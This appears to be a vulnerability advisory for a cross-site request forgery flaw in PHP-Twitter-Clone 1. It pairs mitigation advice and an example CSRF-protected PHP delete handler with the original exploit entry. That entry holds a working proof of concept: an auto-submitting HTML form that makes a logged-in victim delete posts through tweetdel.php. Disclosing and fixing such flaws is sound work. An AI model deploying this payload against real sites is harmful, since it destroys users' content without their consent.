Vendor: PHP-Twitter-Clone
By: L0RD
CVSS: 3.1 MEDIUM
CWE-352: Cross-Site Request Forgery
Product Name: PHP-Twitter-Clone
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:fyffe:php-twitter-clone
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Win 10
Date: 2018

Twitter-Clone 1 – Cross-Site Request Forgery (Delete Post)

An issue was discovered in Twitter-Clone 1 that allows a remote attacker to make any logged-in victim delete posts. tweetdel.php performs the deletion for whatever post ID it receives without an anti-CSRF token, so the attacker can craft a malicious HTML page containing a form that submits to tweetdel.php with the ID of the post they want deleted. When a victim who is logged in to the application visits that page, the form is submitted automatically and the post is deleted under the victim's session.

Mitigation:

Implement a per-session anti-CSRF token in the delete form and have tweetdel.php reject any request whose token is missing or does not match the one stored in the session. Accepting the delete only over POST and marking the session cookie SameSite add defence in depth.
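The fix described above, as an added example that is not PHP-Twitter-Clone's own code: a PHP rewrite of the delete handler with a per-session anti-CSRF token, a constant-time token check, POST-only handling and a SameSite session cookie, plus the matching delete form. The session key `user_id` and the helper `delete_tweet_owned_by()` are assumptions, not names from the project.

```php
<?php
// Added example (not the PHP-Twitter-Clone project's own code): a CSRF-protected
// replacement for tweetdel.php plus the matching delete form. Assumptions:
// the app keeps the logged-in user's id in $_SESSION['user_id'], and a
// hypothetical delete_tweet_owned_by() runs the actual DELETE query.
declare(strict_types=1);

// Defence in depth: a SameSite cookie stops most cross-site POSTs even if a
// handler forgets the token check (array form needs PHP >= 7.3).
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// One random token per session, generated with a CSPRNG.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison so the check does not leak the token byte by byte.
function csrf_valid($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

// Renders the delete form; the hidden token is what an attacker's page cannot read.
function delete_form(int $tweetId): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form action="tweetdel.php" method="post">'
        . '<input type="hidden" name="csrf_token" value="' . $token . '">'
        . '<input type="hidden" name="id" value="' . $tweetId . '">'
        . '<button type="submit">Delete</button>'
        . '</form>';
}

// Hypothetical data-access helper (assumed, not from the project). It must scope
// the DELETE to the owner so a valid token for user A cannot delete user B's posts.
function delete_tweet_owned_by(int $tweetId, int $userId): bool
{
    // e.g. DELETE FROM tweets WHERE id = ? AND user_id = ? via a prepared statement
    return true;
}

// --- tweetdel.php request handling ---
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    exit('Method Not Allowed');
}
if (!csrf_valid($_POST['csrf_token'] ?? null)) {
    http_response_code(403);
    exit('Invalid or missing CSRF token');
}
if (empty($_SESSION['user_id'])) {
    http_response_code(401);
    exit('Login required');
}
// Read the id from the POST body only; ignore any ?id= in the query string.
$id = filter_input(INPUT_POST, 'id', FILTER_VALIDATE_INT);
if ($id === false || $id === null) {
    http_response_code(400);
    exit('Bad tweet id');
}
delete_tweet_owned_by($id, (int) $_SESSION['user_id']);
header('Location: index.php');
```

With this in place the auto-submitting form from the PoC below still reaches tweetdel.php with the victim's session cookie (unless SameSite blocks it), but it fails the token check: a page on the attacker's origin cannot read the victim's session or the hidden field in the legitimate form, so it cannot supply a matching `csrf_token`. Keep the token out of URLs so it does not leak through Referer headers or logs.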

Exploit-DB raw data:

# Exploit Title: Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)
# Date: 2018-08-21
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
# Version: 1
# CVE: N/A
# Tested on: Win 10

# Description :
# An issue was discovered in Twitter-Clone 1 which allows a remote
# attacker to force any victim to delete posts.

# POC :
# Delete posts exploit :

<html>
<head>
   <title>POC</title>
</head>
<body>
<!-- Replace TWEET_ID with the id of the target post; the original PoC passes it
     both in the query string and in the POST body -->
<form action='http://127.0.0.1/clone/twitter-clone/tweetdel.php?id=TWEET_ID' method='post'>
  <input type='hidden' name='id' value='TWEET_ID' />
</form>
   <script>
      // Auto-submit the form as soon as the victim loads the page
      document.forms[0].submit();
   </script>
</body>
</html>